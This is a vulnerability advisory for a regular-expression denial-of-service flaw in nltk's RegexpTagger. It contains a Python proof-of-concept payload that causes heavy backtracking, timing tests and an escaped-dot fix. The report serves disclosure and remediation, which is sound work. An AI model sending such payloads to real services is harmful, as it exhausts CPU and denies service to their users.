CVE-2021-3842: Inefficient Regular Expression Complexity in nltk

nltk is vulnerable to Inefficient Regular Expression Complexity

Description

nltk is vulnerable to a ReDoS (regular expression denial of service) attack because of the regex ^-?[0-9]+(.[0-9]+)?$. If an attacker manages to pass a malicious payload to the RegexpTagger used in the functions get_pos_tagger and malt_regex_tagger, matching will consume excessive CPU time and cause a denial of service.

Proof of Concept

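# PoC.py
import re
import time

# Pattern quoted in the report; the unescaped "." matches any character, digits included.
pattern = re.compile(r"^-?[0-9]+(.[0-9]+)?$")

# A long run of digits followed by a non-digit makes the match fail only after heavy backtracking.
s = "-" + "0" * 50000 + "q"

t = time.perf_counter()
print("searching...")
pattern.search(s)
print(time.perf_counter() - t)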

On my new machine, 50k characters were enough to make the match take more than 23 seconds. For comparison, in a similar report for this project, 160k characters were processed in just over 3 seconds.
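To see how the cost grows without waiting for the full 50k-character payload, the following is a minimal sketch that times the same failing match at a few smaller sizes. The helper name time_failed_match and the chosen sizes are illustrative assumptions, not part of the original report. If the backtracking is roughly quadratic in the number of digits, doubling the input should roughly quadruple the time; absolute timings depend on the machine.

```python
import re
import time

# Pattern quoted in the report (the "." is unescaped).
PATTERN = re.compile(r"^-?[0-9]+(.[0-9]+)?$")


def time_failed_match(n_digits: int) -> float:
    """Return the seconds spent rejecting '-' + n_digits zeros + 'q'.

    Hypothetical helper for illustration only.
    """
    payload = "-" + "0" * n_digits + "q"
    start = time.perf_counter()
    result = PATTERN.search(payload)
    elapsed = time.perf_counter() - start
    assert result is None  # the trailing 'q' makes the overall match fail
    return elapsed


if __name__ == "__main__":
    # Sizes are kept small so the script finishes quickly.
    for n in (1000, 2000, 4000):
        print(f"{n:>5} digits: {time_failed_match(n):.4f} s")
```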

Issue

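The issue is that in ^-?[0-9]+(.[0-9]+)?$ the unescaped . matches any character, including a digit, so [0-9]+ and (.[0-9]+) can match the same run of digits. When the overall match fails, the engine retries every way of splitting that run between the two parts, which causes heavy backtracking.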
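One way to remove the overlap is to escape the dot so that it matches only a literal decimal point. The sketch below assumes that a literal dot was the intended meaning; the report itself does not say which fix the project applied. The names ORIGINAL and ESCAPED are illustrative.

```python
import re

ORIGINAL = re.compile(r"^-?[0-9]+(.[0-9]+)?$")   # "." matches any character
ESCAPED = re.compile(r"^-?[0-9]+(\.[0-9]+)?$")   # "\." matches only a literal dot

# Both patterns accept ordinary numerals.
for text in ("42", "-7", "3.14"):
    assert ORIGINAL.search(text) is not None
    assert ESCAPED.search(text) is not None

# Only the original accepts "1x5", because "." also matches "x".
assert ORIGINAL.search("1x5") is not None
assert ESCAPED.search("1x5") is None

# With the dot escaped, the digit run can no longer be split between the two
# parts, so the PoC payload is rejected without the heavy backtracking.
payload = "-" + "0" * 50000 + "q"
assert ESCAPED.search(payload) is None
```

Escaping the dot also tightens what the pattern accepts, so input such as "1x5" that previously matched is now rejected.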

Impact

This vulnerability can cause a denial of service through CPU exhaustion.

Occurrences
